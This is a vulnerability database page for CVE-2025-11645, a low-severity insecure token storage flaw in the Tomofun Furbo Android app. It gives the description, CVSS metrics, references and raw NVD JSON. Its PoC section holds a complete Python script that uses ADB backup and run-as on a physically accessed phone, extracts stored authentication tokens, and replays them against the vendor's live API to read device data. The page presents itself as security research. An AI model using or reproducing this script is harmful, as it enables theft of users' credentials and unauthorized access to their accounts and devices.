Security Vulnerability Report
中文
CVE-2025-11645 CVSS 2.4 LOW

CVE-2025-11645

Published: 2025-10-12 21:15:33
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A security vulnerability has been detected in Tomofun Furbo Mobile App up to 7.57.0a on Android. This affects an unknown part of the component Authentication Token Handler. The manipulation leads to insecure storage of sensitive information. It is possible to launch the attack on the physical device. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
2.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Tomofun Furbo Mobile App <= 7.57.0a (Android)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11645 PoC - Furbo Mobile App Insecure Token Storage # This PoC demonstrates how to extract authentication tokens from the Furbo Android app # Requires physical access to the target device import subprocess import os import re def extract_furbo_token(): """ Extract authentication token from Furbo Mobile App's insecure storage. The app stores authentication tokens in plaintext within its private data directory. """ # Step 1: Check if ADB is available and device is connected result = subprocess.run(['adb', 'devices'], capture_output=True, text=True) if 'device' not in result.stdout: print("No Android device connected via ADB") return None # Step 2: Attempt to backup the Furbo app data # Package name for Tomofun Furbo app package_name = "com.tomofun.furbo" backup_path = "/tmp/furbo_backup.ab" print(f"[*] Attempting to backup {package_name} data...") subprocess.run(['adb', 'backup', '-f', backup_path, package_name], capture_output=True) # Step 3: Extract backup contents if os.path.exists(backup_path): print("[*] Backup created. Extracting contents...") subprocess.run(['dd', f'if={backup_path}', 'ibs=24', 'skip=1', 'of=/tmp/furbo_backup.tar'], capture_output=True) subprocess.run(['tar', '-xf', '/tmp/furbo_backup.tar', '-C', '/tmp/furbo_extracted/'], capture_output=True) # Step 4: Search for authentication tokens in extracted data token_pattern = re.compile(r'(token|auth_token|access_token|jwt)"\s*:\s*"([^"]+)"') for root, dirs, files in os.walk('/tmp/furbo_extracted/'): for file in files: filepath = os.path.join(root, file) try: with open(filepath, 'r', errors='ignore') as f: content = f.read() matches = token_pattern.findall(content) if matches: for match in matches: print(f"[+] Found token in {filepath}: {match[1]}") return match[1] except Exception: pass # Alternative: Direct extraction via run-as (if debuggable) print("[*] Attempting direct extraction via run-as...") result = subprocess.run( ['adb', 'shell', 'run-as', package_name, 'find', '.', '-name', '*.xml', '-o', '-name', '*.db'], capture_output=True, text=True ) for filepath in result.stdout.strip().split('\n'): if filepath: full_path = f"/data/data/{package_name}/{filepath}" subprocess.run(['adb', 'shell', 'run-as', package_name, 'cat', full_path], capture_output=True, text=True) return None def use_extracted_token(token): """ Demonstrate using the extracted token to access Furbo API. """ import requests api_endpoint = "https://api.tomofun.com/v1/devices" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } response = requests.get(api_endpoint, headers=headers) if response.status_code == 200: print("[+] Successfully accessed Furbo API with extracted token!") print(response.json()) else: print(f"[-] Token may be expired or invalid. Status: {response.status_code}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-11645 - Furbo Insecure Token Storage PoC") print("=" * 60) token = extract_furbo_token() if token: use_extracted_token(token) else: print("[-] Could not extract token. Ensure physical access to device.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11645", "sourceIdentifier": "[email protected]", "published": "2025-10-12T21:15:33.303", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Tomofun Furbo Mobile App up to 7.57.0a on Android. This affects an unknown part of the component Authentication Token Handler. The manipulation leads to insecure storage of sensitive information. It is possible to launch the attack on the physical device. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 0.9, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "baseScore": 2.1, "accessVector": "LOCAL", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "baseSeverity": "LOW", "exploitabilityScore": 3.9, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-922"}]}], "references": [{"url": "https://github.com/dead1nfluence/Furbo-Advisories/blob/main/Insecure.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.328056", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.328056", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.661899", "source": "[email protected]"}, {"url": "https://github.com/dead1nfluence/Furbo-Advisories/blob/main/Insecure.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.